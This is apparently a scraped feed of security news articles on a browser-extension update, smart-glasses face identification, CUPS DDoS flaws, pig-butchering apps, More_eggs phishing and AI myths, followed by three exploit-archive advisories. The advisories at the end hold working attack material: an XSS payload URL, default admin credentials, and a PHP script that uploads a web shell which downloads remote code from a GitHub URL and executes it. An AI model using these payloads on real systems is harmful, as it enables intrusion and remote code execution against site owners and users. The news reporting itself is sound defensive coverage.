Malwarebytes Browser Guard now warns users about recent data breaches, as well as automatically opting users out of tracking cookies.

Two things are true of data online: It will be collected and, just as easily, it will be lost. 

But a major update to Malwarebytes Browser Guard will better protect users from opaque data collection that happens every day online, as well as raising their awareness about corporate data breaches that have left their sensitive information vulnerable to harm.    

First, Browser Guard will now send helpful notifications to users when they visit a website belonging to a company that has suffered a proven data breach in the past 90 days. While everyday users might already know about some of the largest breaches in recent history—AT&T comes to mind—it can be nearly impossible to keep track of every single company that has lost user data in the past.  

With these new data breach notifications, Browser Guard will warn users about recent data breaches they perhaps never heard about, from the 2.2 million people affected by the breach of Rite Aid, to the 1.7 million people affected by the breach of Slim CD, to the 500,000 people affected by the breach of the Texas Dow Employees Credit Union.  

Importantly, Browser Guard will not send repeat notifications that pester return users. The notifications will also include direct access to the Malwarebytes Digital Footprint Portal, allowing users to check in real time whether their data was included in any flagged breach.  

In a second, added feature, Browser Guard is also making it easier to stay private online by automatically opting users out of data collection performed by tracking cookies that are littered across the internet, with no extra effort required on users’ behalf.

These types of cookies are present on nearly every single website that people visit today, from Google to Facebook to YouTube to Reddit. They are invisible pieces of code that advertisers use to track user activity even after they leave a website.

This data, when collected in aggregate, can reveal a person’s age, gender, hometown, relationship status, political beliefs, and so much more. And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space.

For more than a decade, this type of data collection happened invisibly, but when the European Union passed a sweeping set of data protection rights in 2016, much of that changed.

Following the passage of the law (referred to in short as GDPR), users began to see cumbersome popups everywhere across the web that asked about “cookie preferences”—preferences around how these invisible trackers would collect information both for the website itself and for the advertisers using that website to deliver ads.

With the latest Browser Guard update, cookie consent forms will now be auto-rejected, thus requesting the site to honor the most privacy-preserving settings.

What people experience is a simpler and less aggravating internet, where they’re no longer forced to manage yet another aspect of their privacy.

**Download for Free today:**

For a live look at the new Browser Guard, see the video below.

 Browser Guard now flags data breaches and better protects personal data   

Smart glasses that use facial recognition can instantly reveal the identity of someone you're looking at.

Like something out of Black Mirror, two students have demonstrated a way to use smart glasses and facial recognition technology to immediately reveal people’s names, phone numbers, and addresses.

The Harvard students have dubbed the system I-XRAY and it works like this: When you look at someone’s face through the glasses—they used Ray-Ban Meta smart glasses—a connected Artificial Intelligence (AI) platform will look up that face on the internet and pull up all the information it can find about the person.

The Ray-Ban Meta glasses have the ability to livestream video to Instagram. A program monitors that stream and uses the AI to identify faces. It extracts a picture which is then fed into public databases. Depending on the online presence of the person, this can reveal their name, address, phone number, and even relatives.

And as if it wasn’t creepy enough already, it only takes a few seconds before that information shows up on the user’s phone.

If you’d like to see this system in action, one of the students posted a tweet on X that shows you pretty much how effective it can be.

Facial recognition is a technology that has quickly evolved. That’s not always a bad thing, but it poses a privacy issue when the consensus from the person in the database is missing. Many people have become used to being monitored a lot of the time that they spend outside, especially in large cities. But when facial recognition adds an extra layer of tracking, or immediate recognition, it becomes worrying.

In 2021 we wrote:

> “For an individual to identify another individual would require access to a large database or an enormous amount of luck.”

But, thanks to the advancement of AI, this is no longer true. Identification can be done in seconds, for almost everybody that has an online presence, and just from public databases.

In the demo, the students claim they were able to identify dozens of people without their knowledge, although in some cases the system gave the wrong name.

It’s quite obvious that in the wrong hands this could be used to defraud or track people. The students have no intention of sharing their code, but they are not the first ones to come up with the idea or even make it work.

In 2022, a company called Clearview AI was permanently banned from selling its faceprint database within the United States. The facial recognition software and surveillance company was known for scraping images of people from social networking sites, particularly Facebook, YouTube, Venmo, and other websites. Clearview’s app was able to show you additional photos of a person—after taking a snap of them—along with links to where these appeared. Now, Clearview sells its product to law enforcement, and it’s also explored a pair of smart glasses that would run its facial recognition technology.

Also in 2022, a company called PimEyes was accused of “surveillance and stalking on a scale previously unimaginable.” PimEyes is an online face search engine that searches the internet to find pictures of particular faces. The search engine uses Artificial Intelligence (AI) for facial recognition combined with reverse image search technology to find other photos of a person published online, based on a picture submitted by the user.

In 2023, the New York Times published a story about “the technology Facebook and Google didn’t dare release” about how the two companies stopped development of technology that used facial recognition to identify people.

What’s changed since then:

*   The glasses look like any other Ray Ban so you’ll be clueless about getting identified
*   Facial recognition has been perfected even more
*   AI can be used to quickly gather and analyze data.

Sadly, there’s not a huge amount you can do to stop someone looking you up in this way. However, there are ways to limit how much information is out there about you. Be careful about how much information you post about yourself online, and as much as possible make sure social media posts aren’t publicly accessible.

You can also check and remove yourself from people databases. The students suggested a few that you can opt-out of.

****Remove yourself from Reverse Face Search Engines****

The major, most accurate reverse face search engines, Pimeyes and Facecheck.id, offer free services to remove yourself. 

*   Pimeyes
*   Facecheck ID

****Remove yourself from People Search Engines****

Most people don’t realize that from just a name, one can often identify the person’s home address, phone number, and relatives’ names. Here are some of the major people search engines:

*   FastPeopleSearch
*   CheckThem
*   Instant Checkmate
*   Extensive list compiled by the New York Times

**Scrub your data**

If you’re in the US, you can also use **Malwarebytes Personal Data Remover** to help find and remove your personal information from data broker sites.

 Not Black Mirror: Meta&#8217;s smart glasses used to reveal someone&#8217;s identity just by looking at them 

All an attacker needs to exploit flaws in the Common Unix Printing System is a few seconds and less than 1 cent in computing costs.

Source: sofiacorte via Shutterstock

It turns out that remote code execution is not the only way attackers can leverage a critical set of four vulnerabilities that a researcher recently disclosed in the Common Unix Printing System (CUPS) for managing printers and print jobs.

The vulnerabilities apparently also enable adversaries to stage substantial distributed denial-of-service (DDoS) attacks in mere seconds and at a cost of less of than 1 cent, using any modern cloud platform.

**Large Number of Potential DDoS Attack Systems**

Some 58,000 Internet-exposed devices are currently vulnerable to the attack and can be relatively easily co-opted into launching an endless stream of attempted connections and requests at target systems. An attacker that corralled all 58,000 vulnerable hosts could send a small request to each vulnerable CUPS host and get them to direct between 1GB and 6GB of useless data at a target system.

"Although these bandwidth numbers may not be considered earth-shattering, they would still result in the target's need to handle roughly 2.6 million TCP connections and HTTP requests in either scenario," researchers at Akamai said this week after discovering the new attack vector.

CUPS is an Internet Printing Protocol (IPP)-based open source printing system for Unix-like operating systems, including Linux and macOS. It provides a standard way for computers to manage printers and print jobs.

Independent security researcher Simone Margaritelli last week disclosed a serious flaw in CUPS that could allow an attacker to remotely execute malicious commands by manipulating URLs using a combination of four different vulnerabilities. The vulnerabilities are CVE-2024-47176 in "cups-browsed," a component for simplifying printer discovery and management in a network; CVE-2024-47076 in the "libcupsfilters" software library; CVE-2024-47175 in the "libppd" library; and CVE-2024-47177 in the "cups-filters" package.

Margaritelli described the vulnerabilities as affecting most GNU/Linux distributions, some BSDs, Oracle Solaris, potentially Google Chrome OS and Chromium, and other operating systems. "The short version of this exploit is that certain configurations of cups-browsed as well as associated CUPS libraries each have vulnerabilities that, put together, allow an attacker to execute arbitrary commands against a target system" and potentially gain control of it, open source and software bill of materials management vendor Fossa said in an analysis.

**All It Takes is a Single Packet**

Margaritelli's research focused on how attackers could leverage the vulnerabilities to take control of CUPS hosts. What Akamai discovered is that a threat actor could also use them for DDoS attacks. "The problem arises when an attacker sends a crafted packet specifying the address of a target as a printer to be added," Akamai said. "For each packet sent, the vulnerable CUPS server will generate a larger and partially attacker-controlled IPP/HTTP request directed at the specified target." Akamai found that all it takes for someone to launch an attack is to send a single maliciously crafted packet to a vulnerable CUPS service with Internet connectivity.

Kyle Lefton, security researcher at Akamai, says that while the previously reported RCE exploit is more dangerous, the DDoS vulnerability is much easier for a threat actor to exploit. "It is likely that organizations may start seeing attacks leveraging this vulnerability, which causes issues for not just the targets of these DDoS attacks, but those running the vulnerable CUPS servers as well," he says. "The key takeaway here is to stress the importance of patching outdated CUPS systems, or applying other mitigation techniques, such as removing CUPS if deemed unnecessary, or applying firewall rules for UDP port 631 and keeping them from accessing the public Internet."

Akamai researchers discovered a total of 198,000 vulnerable CUPS hosts that are Internet accessible. Of those, 34%, or more than 58,000, are vulnerable to corralling for DDoS attacks. Akamai found that a threat actor could get these systems to start spewing out attack traffic by using a simple script to send a single malicious UDP packet to a vulnerable CUPS host. They found they could substantially amplify attack traffic volumes by padding — or adding extra and often irrelevant characters or data — to the URL payload.

Larry Cashdollar, principal security researcher at Akamai, says the vulnerability of a CUPS host to the DDoS attack really depends on its configuration. "It's possible that network administrators might have additional firewalls in place to block outbound traffic from the printers or that system administrators have done their hardening of the printer servers," on the other vulnerable hosts, Cashdollar says.

**Strain on Server Hardware**

Troublingly, although organizations running vulnerable CUPS systems may not be the target of DDoS attacks, the attacks themselves can put strain on the server hardware, Lefton adds. "We confirmed that some of these CUPS systems complete TLS handshakes to HTTPS protected websites, which creates further strain on server hardware and resource consumption overhead due to the handshake and encryption/decryption processing."

DDoS attacks, though well understood, continue to present a challenge for many organizations. Though many companies have implemented robust measures for protecting against DDoS attacks and mitigating fallout, the number of these attacks have only increased. Recent numbers from Cloudflare showed a 20% year-over-year increase in DDoS attacks; the company said it mitigated 8.5 million DDoS attacks just in the first six months of this year. Cloudflare attributed the trend at least partly to more threat actors gaining access to capabilities that once were available only to nation-state actors, thanks to the rise in generative AI (GenAI) tools and autopilot systems for writing attack code better and faster.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Unix Printing Vulnerabilities Enable Easy DDoS Attacks

A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims, per findings from Group-IB.
The campaign is part of a consumer investment fraud scheme that's also widely known as pig butchering, in which prospective victims are lured into making investments in cryptocurrency or other financial

A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims, per findings from Group-IB.

The campaign is part of a consumer investment fraud scheme that's also widely known as pig butchering, in which prospective victims are lured into making investments in cryptocurrency or other financial instruments after gaining their trust under the guise of a romantic relationship or an investment advisor.

Such manipulative and social engineering operations often end with the victims losing their funds, and in some cases, extracting even more money from them by requesting various fees and other payments.

The Singapore-headquartered company said the campaign has a global reach, with victims reported across Asia-Pacific, European, Middle East and Africa. The bogus apps, built using the UniApp Framework, have been classified under the moniker **UniShadowTrade**.

The activity cluster is said to have been active since at least mid-2023, luring victims with malicious apps with the promise of quick financial gain. A noteworthy aspect of the threat is that one of the apps managed to even get past Apple's App Store review process, thus lending it an illusion of legitimacy and trust.

The app in question, SBI-INT, is no longer available for download from the app marketplace, but it masqueraded as software for "commonly used algebraic mathematical formulas and 3D graphics volume area calculation."

It's believed that the cybercriminals accomplished this by means of a check that included the app's source code that checked if the current date and time is earlier than July 22, 2024, 00:00:00, and if so, launched a fake screen with formulae and graphics.

But once it was taken down weeks after it was published, the threat actors behind the operation are said to have pivoted to distributing the app, for both Android and iOS, via phishing websites.

"For iOS users, pressing the download button triggers the download of a .plist file, prompting iOS to ask for permission to install the application," Group-IB researcher Andrey Polovinkin said.

"However, after the download is complete, the application cannot be launched immediately. The victim is then instructed by the cybercriminals to manually trust the Enterprise developer profile. Once this step is completed, the fraudulent application becomes operational."

Users who end up installing the app and opening it are greeted with a login page, requiring users to provide their phone number and password. The registration process involves entering an invitation code in the app, suggesting that the attackers are targeting specific individuals to pull off the scam.

A successful registration triggers a six-step attack process wherein the victims are urged to provide identity documents as proof, personal information, and current job details, after which they are asked to agree to the service's terms and conditions in order to make the investments.

Once the deposit has been made, the cybercriminals send further instructions on which financial instrument to invest in and often guarantee that they will yield high returns, thereby deceiving users into investing more and more money. To maintain the ruse, the app is rigged to display their investments as making gains.

Trouble starts when the victim attempts to withdraw the funds, at which point they are asked to pay additional fees to recover their principal investments and purported gains. In reality, the funds are stolen and diverted to accounts under the attackers' control.

Another novel tactic adopted by the malware authors is the use of an embedded configuration that includes specifics about the URL that hosts the login page and other aspects of the purported trading application launched within the app.

This configuration information is hosted in a URL associated with a legitimate service called TermsFeed that offers compliance software for generating privacy policies, terms and conditions, and cookie consent banners.

"The first discovered application, distributed through the Apple App Store, functions as a downloader, merely retrieving and displaying a web-app URL," Polovinkin said. "In contrast, the second application, downloaded from phishing websites, already contains the web-app within its assets."

This, per Group-IB, is a deliberate approach taken by the threat actors to minimize the chances of detection and avoid raising red flags when the app is distributed through the App Store.

Furthermore, the cybersecurity firm said it also discovered one of the fake stock investment scam apps on the Google Play Store that went by the name FINANS INSIGHTS (com.finans.insights). Another app linked to the same developer, Ueaida Wabi, is FINANS TRADER6 (com.finans.trader)

While both Android apps are not present in the Play Store, statistics from Sensor Tower show that they were downloaded less than 5,000 times. Japan, South Korea, and Cambodia were the top three countries served by FINANS INSIGHTS, whereas Thailand, Japan, and Cyprus were the primary regions where FINANS TRADER6 was available.

"Cybercriminals continue to use trusted platforms such as the Apple Store or Google Play to distribute malware disguised as legitimate applications, exploiting users' trust in secure ecosystems," Polovinkin said.

"Victims are lured in with the promise of easy financial gains, only to find that they are unable to withdraw funds after making significant investments. The use of web-based applications further conceals the malicious activity and makes detection more difficult."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Fake Trading Apps Target Victims Globally via Apple App Store and Google Play

A spear-phishing email campaign has been observed targeting recruiters with a JavaScript backdoor called More_eggs, indicating persistent efforts to single out the sector under the guise of fake job applicant lures.
"A sophisticated spear-phishing lure tricked a recruitment officer into downloading and executing a malicious file disguised as a resume, leading to a more_eggs backdoor infection,"

A spear-phishing email campaign has been observed targeting recruiters with a JavaScript backdoor called More\_eggs, indicating persistent efforts to single out the sector under the guise of fake job applicant lures.

"A sophisticated spear-phishing lure tricked a recruitment officer into downloading and executing a malicious file disguised as a resume, leading to a more\_eggs backdoor infection," Trend Micro researchers Ryan Soliven, Maria Emreen Viray, and Fe Cureg said in an analysis.

More\_eggs, sold as a malware-as-a-service (MaaS), is a malicious software that comes with capabilities to siphon credentials, including those related to online bank accounts, email accounts, and IT administrator accounts.

It's attributed to a threat actor called the Golden Chickens group (aka Venom Spider), and has been put to use by several other e-crime groups like FIN6 (aka ITG08), Cobalt, and Evilnum.

Earlier this June, eSentire disclosed details of a similar attack that leverages LinkedIn as a distribution vector for phony resumes hosted on an attacker-controlled site. The files, in reality, are Windows shortcut (LNK) files that, upon opening, trigger the infection sequence.

The latest findings from Trend Micro mark a slight deviation from the earlier observed pattern in that the threat actors sent a spear-phishing email in a likely attempt to build trust and gain their confidence. The attack was observed in late August 2024, targeting a talent search lead working in the engineering sector.

"Shortly after, a recruitment officer downloaded a supposed resume, John Cboins.zip, from a URL using Google Chrome," the researchers said. "It was not determined where this user obtained the URL. However, it was clear from both users' activities that they were looking for an inside sales engineer."

The URL in question, johncboins\[.\]com, contains a "Download CV" button to entice the victim into downloading a ZIP archive file containing the LNK file. It's worth noting that the attack chain reported by eSentire also includes an identical site with a similar button that directly downloads the LNK file.

Double-clicking the LNK file results in the execution of obfuscated commands that lead to the execution of a malicious DLL, which, in turn, is responsible for dropping the More\_eggs backdoor via a launcher.

More\_eggs commences its activities by first checking if it's running with admin or user privileges, followed by running a series of commands to perform reconnaissance of the compromised host. It subsequently beacons to a command-and-control (C2) server to receive and execute secondary malware payloads.

Trend Micro said it observed another variation of the campaign that includes PowerShell and Visual Basic Script (VBS) components as part of the infection process.

"Attributing these attacks is challenging due to the nature of MaaS, which allows for the outsourcing of various attack components and infrastructure," it said. "This makes it difficult to pin down specific threat actors, as multiple groups can use the same toolkits and infrastructure provided by services like those offered by Golden Chickens."

That said, it's suspected that the attack could have been the work of FIN6, the company noted, citing the tactics, techniques, and procedures (TTPs) employed.

The development comes weeks after HarfangLab shed light on PackXOR, a private packer used by the FIN7 cybercrime group to encrypt and obfuscate the AvNeutralizer tool.

The French cybersecurity firm said it observed the same packer being used to "protect unrelated payloads" such as the XMRig cryptocurrency miner and the r77 rootkit, raising the possibility that it could also be leveraged by other threat actors.

"PackXOR developers might indeed be connected to the FIN7 cluster, but the packer appears to be used for activities that are not related to FIN7," HarfangLab said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Fake Job Applications Deliver Dangerous More_eggs Malware to HR Professionals

Pig Butchering scam targets crypto users with fake trading apps on Apple and Google Play Stores. Disguised as…

Pig Butchering scam targets crypto users with fake trading apps on Apple and Google Play Stores. Disguised as legitimate platforms, these apps defraud investors, bypassing store checks and exploiting unsuspecting users globally.

A fraud campaign targeting **Apple iOS and Android users** has been discovered by GroupIB, involving fake trading apps. These apps, found on Apple’s App Store and Google Play, and on phishing sites, are part of a Pig Butchering scam targeting cryptocurrency investors in Asia-Pacific, Middle East & Africa, and European regions.

Group-IB’s Threat Intelligence, and Fraud Protection analysts first discovered these fake mobile applications in May 2024 and have been investigating the campaign ever since.

According to their **report** shared with Hackread.com ahead of publishing on Wednesday, these applications were developed for Android using a single cross-platform framework. One was distributed through the Google Play store, while another targeted iOS devices.

What’s worse, unlike traditional mobile trojans, these applications had no typical malicious features and cybercriminals have created a facade of a legitimate trading platform to defraud victims.

The fraudulent apps check the current date and time to bypass Apple’s App Store checks, launching a fake activity with mathematical formulas and graphics if it is earlier than 22 July 2024, 00:00:00. Android samples were designed to display a fraudulent trading application hosted on the api.fxbrokerscc domain, part of a larger fraudulent infrastructure.

According to researchers, these fake trading apps and downloader apps mimic legitimate platforms and may include features like account settings, transaction history, and stock information. Downloader apps, found in the Apple App Store or distributed through phishing websites, prompt victims to install the fraudulent app.

Fake app on Apple Store (left) – Fake app on Google Play Store (Screenshot: Ground-IB)

The malware family used in the pig butchering scam is **UniShadowTrade**, classified under the UniApp Framework. This name is given by Group-IB analysts to categorize the fraudulent applications involved in the scam. For your information, the UniApp framework enables developers to create cross-platform applications with a single codebase, making it easier for scammers to develop and distribute malware.

****What Exactly is Pig Butchering?****

For your information, **Pig butchering** is a notorious digital scam that involves a meticulous process of grooming victims, building trust, and ultimately defrauding them of their money.

This particular campaign follows a specific pattern: target identification through social media, grooming and trust-building through social engineering techniques, offering a seemingly lucrative investment opportunity in cryptocurrency or other investments, encouraging a small initial investment, and building confidence through small profits.

Scammers pressure victims into making large investments, transfer funds they cannot withdraw, and disappear. This process continues until the victim is unable to withdraw the funds, causing significant financial loss and affecting their financial stability.

Nevertheless, scams Pig butchering can have devastating consequences for victims. Understanding scammers’ tactics and taking proactive measures can reduce the risk of falling victim to such fraud.

****Alert for Android and iOS users****

It is a fact that Google, which owns Android, and Apple, which owns the iOS App Store, try their best to keep the marketplace safe from malware and other cybersecurity threats. Despite constant monitoring, cybercriminals often slip into these stores with malicious apps, draining the bank accounts and crypto wallets of unsuspecting users.

Just last week, **Google approved** a crypto drainer app on the Play Store that stole over $70,000 from Android users. On the other hand, **in February 2024**, Apple approved a fake LastPass Password Manager app on its iOS App Store. The same month, Apple approved a **fake Rabby Wallet app** that stole millions from unsuspecting users.

Therefore, be extra careful when downloading an app from any of these stores. Check their reviews, search for the official app on Google, find their social media platforms, and confirm whether the app advertised on app stores is legitimate or not.

1.  **Phishing Scam Hits European Bank Users on iOS and Android**
2.  **Scylla Ad Fraud on iOS, Android Users Halted by Apple, Google**
3.  **Pink Drainer Posed as Journalists, Stole $3M from Twitter Users**
4.  **Hackers Posed as Google Support to Steal $243 Million in Crypto**
5.  **Apple mistakenly approved malware masked as Adobe Flash Player**

Pig Butchering: Fake Trading Apps Target Crypto on Apple, Google Play Stores

Organizations looking to maximize their security posture will find AI a valuable complement to existing people, systems, and processes.

Source: marcos alvarado via Alamy Stock Photo

COMMENTARY

The global rise of increasingly sophisticated cybercrimes creates daily challenges for the cybersecurity industry, as security professionals grapple with new and evolving attacks, complex IT architecture, and the integration of artificial intelligence (AI) into nefarious actors' tactics, techniques, and procedures (TTPs). As a result, cybersecurity practitioners feel a sense of urgency to stay at the forefront of technological advances to defend against a growing arsenal of exploits.

In this environment, a methodical approach to the intentional use of AI for cybersecurity protocols will help avoid falling prey to the hype and myths of groupthink, such as these five myths of AI and cybersecurity: 

**1\. You'll fall behind if AI isn't your primary solution for cybersecurity.**

While AI can enhance cybersecurity tasks by analyzing large volumes of data to recognize nefarious identifying patterns, it can also be susceptible to false positives and negatives, be trained on bad data, or act in unexpected ways. Many common cyber threats can still be effectively mitigated through basic security practices like strong passwords, regular patching, and employee awareness about social engineering. Incorporating AI into security solutions is not a license to abandon proven tools and replace established best practices. Sophisticated attackers will find ways to evade AI-based detection, so adopting AI cannot be the only solution for security and defense. Time-tested security practices like organizational culture, leadership commitment, and employee training are still critical fundamentals of a robust organizational risk management practice. 

**2\. Threat actors are using AI, which will lead to an exponential increase in cyberattacks.**

AI is undoubtedly a powerful tool that can be used for both good and bad — it's not a guaranteed game-changer for threat actors. The cybersecurity landscape is a dynamic battleground, and the interplay between AI-powered attacks and defenses is complex. AI may increase the speed and sophistication of certain attacks, such as better phishing attempts; however, it has not fundamentally changed the attack vectors or the attack surface within organizations. A mature security posture using foundational defensive practices continues to be a sound approach to reducing risk and thwarting attacks. 

**3\. AI-powered tools are better, and every tool needs an AI feature.**

AI-aided tools can provide powerful additions to a defensive infrastructure with quicker, more comprehensive data discovery. Left unchecked, AI is capable of producing sometimes comical but altogether bad results, such as the Google Overview suggestion of adding glue to homemade pizza sauce, or the McDonald's AI drive-through putting bacon on ice cream. In cybersecurity, erroneous results have serious consequences, including loss of trust, excessive costs, and endangering human safety. The potential benefit of any AI-powered resource must be balanced against the potential cost of error. The safest use of AI is within a layered defense model, which allows for verification and redundancy in protective solutions. 

**4\. You can only combat AI with AI.**

AI is a valuable tool in the cybersecurity quiver, but it's not impenetrable. Like any other defensive technique, attackers can exploit vulnerabilities in AI models or develop exploits to bypass AI defenses. Combating AI threats requires a multilayered approach that combines AI with human expertise, traditional security measures, and a strong focus on prevention, detection, and response. Using AI to combat AI may also raise ethical and legal concerns, particularly around issues like autonomous decision-making, accountability, and potential for misuse. These concerns must be carefully considered before implementation, to ensure responsible, ethical use of AI in cybersecurity. By leveraging the strengths of both humans and AI, organizations can build a more resilient and effective cybersecurity posture. 

**5\. AI is going to replace your job.**

Companies who are hiring fewer entry-level people for cybersecurity roles are not doing so because AI has eliminated those jobs; rather, they are limited by shrinking budgets and a need to hire people who can make an immediate impact when they come onboard. AI excels at automating repetitive tasks, analyzing vast amounts of data and identifying patterns, but human intuition and judgment is still needed to interpret those insights, make critical decisions, and adapt strategies to combat evolving threats. At its best, AI allows humans to focus on creative and strategic thinking to deliver complex problem-solving. The prominence of AI has created new jobs like AI engineers and AI ethicists to manage AI systems. AI-related roles, along with roles in cybersecurity, will continue to emerge and evolve. AI won't replace people, but people who know how to work with AI may replace people who don't. 

Effective cybersecurity requires a multilayered approach that combines technology, processes, and people. Solely relying on AI for cybersecurity can create a false sense of security, and AI-based cybersecurity solutions can be costly and complex. While AI is transforming the workforce, it's unlikely to lead to widespread job displacement. Instead, it likely will change the nature of work and require adaptation and development of new skills.

Progressive companies will see the value of investing in training programs and implementing policies that support workforce transition. Organizations looking to maximize their security posture with enhanced value, productivity, creativity, and innovation will find AI a valuable complement to existing people, systems, and processes.  

**About the Authors**

Senior Vice President & Executive Dean, Western Governors University

Paul Bingham is the senior vice president and executive dean at Western Governors University’s School of Technology, which currently serves 60,000 students nationwide and is the top conferrer of cybersecurity degrees in the country. Prior to WGU, Paul spent 24 years as an FBI agent, leading and managing domestic and international cybersecurity investigations and FBI SWAT teams on over 100 high-risk tactical missions. 

SIEM & Data Analytics Engineer, H2L Solutions Inc.

Micah VanFossen is a cybersecurity engineer currently working as a SIEM & Data Analytics Engineer at H2L Solutions Inc., where he focuses on data ETL (enrich, transform, load) processes, detections, and data analysis. He is a lifelong learner, spending time researching, studying, and educating others through his blog, The Purple Van. Micah is also a member of the SIII Tiger Team for the US Cyber Games Program and holds an MS in cybersecurity and information assurance from WGU.

Top 5 Myths of AI &amp; Cybersecurity

Tourism Management System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Tourism Management System 1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tourism_1.zip                                         |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /rate_review.php?id=1"><script>alert(/indoushka/)</script>[+] http://localhost/tourism/rate_review.php?id=1%22%3E%3Cscript%3Ealert(/indoushka/)%3C/script%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tourism Management System 1.0 Cross Site Scripting

Teacher Subject Allocation Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Teacher Subject Allocation Management System 1.0 Insecure Settings Vulnerability                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/tsas/admin/login.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Teacher Subject Allocation Management System 1.0 Insecure Settings

Task Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Task Management System 1.0 php code injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/task-management-system-in-php-mysql-source-code/?wpdmdl=8164&refresh=66bb949d45e891723569309 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP code is designed to create a file and inject PHP code.[+] save payload as poc.php [+] usage : C:\www\test>php poc.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'firstname' => 'az',        'lastname' => 'azgt',        'email' => 'az@gt.gt',        'password' => 'az@gtgt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$target_ip/ajax.php?action=update_user");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $target_ip/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#google